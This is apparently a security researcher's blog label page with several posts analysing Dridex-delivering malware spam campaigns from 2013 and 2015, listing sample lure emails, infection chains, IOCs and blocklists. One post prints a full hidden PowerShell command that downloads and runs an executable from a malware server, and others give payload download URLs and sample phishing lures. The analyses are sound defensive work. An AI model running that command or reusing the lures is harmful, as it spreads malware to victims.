Sponsored by..

Showing posts with label VBScript. Show all posts
Showing posts with label VBScript. Show all posts

Tuesday 12 May 2015

Malware spam: "ATTN: Outstanding Invoices - [4697E0] [April|May]"

This spam comes with random senders and reference numbers, but in all cases includes a malicious attachment:

From:    Debbie Barrett
Date:    12 May 2015 at 11:14
Subject:    ATTN: Outstanding Invoices - [4697E0] [April|May]

Dear anthony,

Kindly find attached our reminder and copy of the relevant invoices.
Looking forward to receive your prompt payment and thank you in advance.

Kind regards
The attachment name combines the recipient's email address with the fake reference number, e.g. barry_51DDAF.xls which isn't actually an Excel file at all, but a multipart MIME file. Payload Security's Hybrid Analysis tools manages to analyse it though, showing several steps in the infection chain.

First a VBScript is downloaded from pastebin[.]com/download.php?i=5K5YLjVu

Secondly, that VBScript then downloads a file from 92.63.88[.]87:8080/bt/get.php (MWTV, Latvia) which is saved as crypted.120.exe, this has a detection rate of 2/57.

This component then connects to 46.36.217.227 (FastVPS, Estonia) and according to this Malwr report drops a Dridex DLL with a detection rate of 3/56.

There are several different attachments, so far I have seen the following MD5s:
110B42E097A7677A993CF1B3B24743D8
20AEB9ECEBC26B3CDE960728E890F904
33A8CBE7B75B20B5EA1069E3E2A13D80
3973E29F7BDC7903FFCB596B10F9FD54
7019D711AE0E2FEDEE25EAA3341CFB7F
949816F4DF724E690690B3C8AD3871D4
9CDEFFBAC7B79302D309404E6F3068C4
B5C2393D44D8E0C94D04E2D159AE8776
B84D52F59AEC53B8D7FA109D256FCB6B
CA5E8A531A8EE24B15FC7B2A66502042
E99216D829C632DF24ECAD9162AF654C
EC1AD4316DBA799EF2E2440E715CD5F5
F4B5B0AE85F27E0A475BD359F5BE76E8
F666682D638FE67607DD189705844AD5

The MD5s for the malware components are:
DD7ADC5B140835DC22F6C95694F9C015
9AFECFAA484C66F2DD11F2D7E9DC4816
838F0A8D3FCBD0DDB2F8E8D236D17957

Recommended blocklist:
92.63.88.0/24
46.36.217.227


Wednesday 22 April 2015

Malware spam: "New document with ID:G27427P from RESTAURANT GROUP PLC was generated"

Made in Russia
I have only seen one sample of this spam so far, it is likely that other variants use different company names:

From:    Tamika Cortez
Date:    22 April 2015 at 14:33
Subject:    New document with ID:G27427P from RESTAURANT GROUP PLC was generated

New report with ID:G27427P was generated by our system. Please follow the link below to get your report.

Download report ID:G27427P

Best regards ,Tamika Cortez
RESTAURANT GROUP PLC

In this case, the link in the email goes to:

http://igruv.tourstogo.us/oalroshimt/fokreeshoo/thovoaksij?arg1=victim@victimdomain.com&arg2=G27427P.vbs&arg3=RESTAURANT%20GROUP%20PLC

..which includes the victim's email address in the URL. In turn, this redirects to:

http://igruv.tourstogo.us/oalroshimt/fokreeshoo/thovoaksij/files/G27427P.vbs  

As the name suggests, this is a VBScript (VT 1/56), in this case it is lightly obfuscated [pastebin] and it initiates a download from:

http://185.91.175.183/sas/evzxce.exe

..which is saved as %TEMP%\jhvwrvcf.exe. The download location is 176.31.28.226 (OVH, France). This file has a VirusTotal detection rate of 6/57. Automated analysis tools [1] [2] [3] show network connections to the following IPs:

144.76.73.3 (Hetzner, Germany)
5.44.216.44 (Camelhost SIA, Latvia)
62.210.214.249 (Iliad Entreprises / Poney Telecom, France)
89.184.66.18 (Invest Ltd, Ukraine)


According to this Malwr report, it drops a Dridex DLL with a detection rate of 3/57.

Recommended blocklist:
176.31.28.226
144.76.73.3
5.44.216.44
62.210.214.249
89.184.66.18


MD5s:
1fc2abec9c754e8cc1726bf40e0b3533
af8ff1ea180d5c45b4bb8c8f17c6cddc
57b54e248588af284871c2076f05651c



Wednesday 1 April 2015

Malware spam "Unpaid Invoice [09876] attached" / "This is your Remittance Advice [ID:12345]" with VBS-in-ZIP attachment

This rather terse spam has no body text and comes from random senders. It has a ZIP attachment which contains a malicious script.

Example subjects include:
Unpaid Invoice [09323] attached
Unpaid Invoice [86633] attached
Unpaid Invoice [35893] attached
This is your Remittance Advice [ID:42667]
This is your Remittance Advice [ID:69951]

Example senders:
SAROSSA PLC
32RED
NOIDA TOLL BRIDGE CO

Example attachment names:
RC422QNSB.zip
ML82034PMRY.zip
MK843NCAK.zip
OI8244LPNH.zip
ZW1760EHOG.zip
MANX FINANCIAL GROUP PLC
RARE EARTH MINERALS PLC

Inside is a malicious VBS script. It is likely that there are several different versions, the one working sample I saw looked like this [pastebin] which is very similar to the VBA macro used in this spam run yesterday.

When run (I don't recommend this!) it executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.202/sqwere/casma.gif','%TEMP%\giuguiGIUGdsuf87t6F.cab'); expand %TEMP%\giuguiGIUGdsuf87t6F.cab %TEMP%\giuguiGIUGdsuf87t6F.exe; Start-Process %TEMP%\giuguiGIUGdsuf87t6F.exe;
Because there are probably several different versions of this script, there are probably several different download locations. In this case, a fake .GIF file is downloaded from a malware server at 193.26.217.202 (Servachok Ltd, Russia) which is actually an .EXE file, but it gets saved as a .CAB file. For no very good reason it is passed through EXPAND which does nothing but save it to %TEMP%\giuguiGIUGdsuf87t6F.exe.

This binary has a detection rate of 4/55. Automated analysis tools [1] [2] [3] [4] show that the malware attempts to phone home to:

188.120.225.17 (TheFirst-RU, Russia)
121.50.43.175 (Tsukaeru.net, Japan)
82.151.131.129 (DorukNet, Turkey)
92.63.88.83 (MWTV, Latvia)
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
199.201.121.169 (Synaptica, Canada)
188.226.129.49 (Digital Ocean, Netherlands)
192.64.11.232 (Synaptica, Canada)
77.74.103.150 (iway AG GS, Switzerland)
1.164.114.195 (Data Communication Business Group, Taiwan)
5.135.28.104 (OVH / Simpace.com, UK)
46.19.143.151 (Private Layer Inc, Switzerland)

It also drops another variant of the same downloader, edg1.exe with a detection rate of 3/56 and a Dridex DLL with a detection rate of 9/56.

Recommended blocklist:
188.120.225.17
121.50.43.175
82.151.131.129
92.63.88.0/24
95.163.121.0/24
199.201.121.169
188.226.129.49
192.64.11.232
77.74.103.150
1.164.114.195
5.135.28.104/29
46.19.143.151

Saturday 7 September 2013

Dealerbid.co.uk "Quotation.zip" spam with malicious VBS script

The website dealerbid.co.uk has been compromised and their servers hacked in order to send spam to their customer list. Something similar has happened before a few months ago.

In this case the spam email was somewhat mangled, but I am assuming that the spammers know how to fix this. The spam email is as follows:

From:     Christopher Rawson [christopher.r@kema.com]
Date:     7 September 2013 14:04
Subject:     Quotation

Hello,

We have prepared a quotation, please see attached

With Kind Regards,
Christopher Rawson,
DNV KEMA Energy & Sustainability,

DNV KEMA is a real, legitimate company in the energy sector. But they did not send the spam, an examination of the headers shows that the sending IP is 213.171.204.75 which is the same IP as www.dealerbid.co.uk and mail.dealerbid.co.uk. The email is sent to an address ONLY used to register at dealerbid.co.uk. So, the upshot is that this domain is compromised and it is compromised right now.

The email is meant to have an attachment called Quotation.zip but in my sample the email was mis-formatted and instead the Base 64 encoded ZIP file was in the main body text, starting thus:

UEsDBBQAAAAIAGiQJENXc/
KQmRoAACj9AQANAAAAUXVvdGF0aW9uLnZic+1dS3PcOJK+K0L/QeHD
Some copy-and-pasting and work with a Base 64 decoder ended up with a valid ZIP file, containing a somewhat obfuscated VBS script Quotation.vbs  with a low VirusTotal detection rate of 4/46.

I really don't know a lot about VBScript, but it's an interpreted language (like Javascript), so with some care you can get it do decode itself for you. The payload of the scripts was delivered by a line
execute (lqkxATqgKvblFIwSvnvFaUHynrslFbmIziWPjzin)
Changing "execute" to a a series of commands to write a file out.txt can get the script to decode itself and present the deobfuscated code for you.

Set objFSO=CreateObject("Scripting.FileSystemObject")
outFile="out.txt"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write execute (lqkxATqgKvblFIwSvnvFaUHynrslFbmIziWPjzin) & vbCrLf
objFile.Close
Obviously, great care should be taken to do this and a throwaway virtual machine is advised in case of errors.

I haven't had time to do much analysis of the malicious script, except that it attempts to download further components from klonkino.no-ip.org (port 1804) which is hosted on 146.185.24.207 (Hosting Services Inc, UK). I strongly recommend blocking no-ip.org domains in any case, but I certainly recommend the following blocklist:
klonkino.no-ip.org
146.185.24.207

I haven't had time to analyse the second script further, but it has a VirusTotal detection rate of 21/47 which isn't too bad. If you want to have a look yourself, you can download the script from here (zip file, password = virus).. but obviously you need to know what you are doing!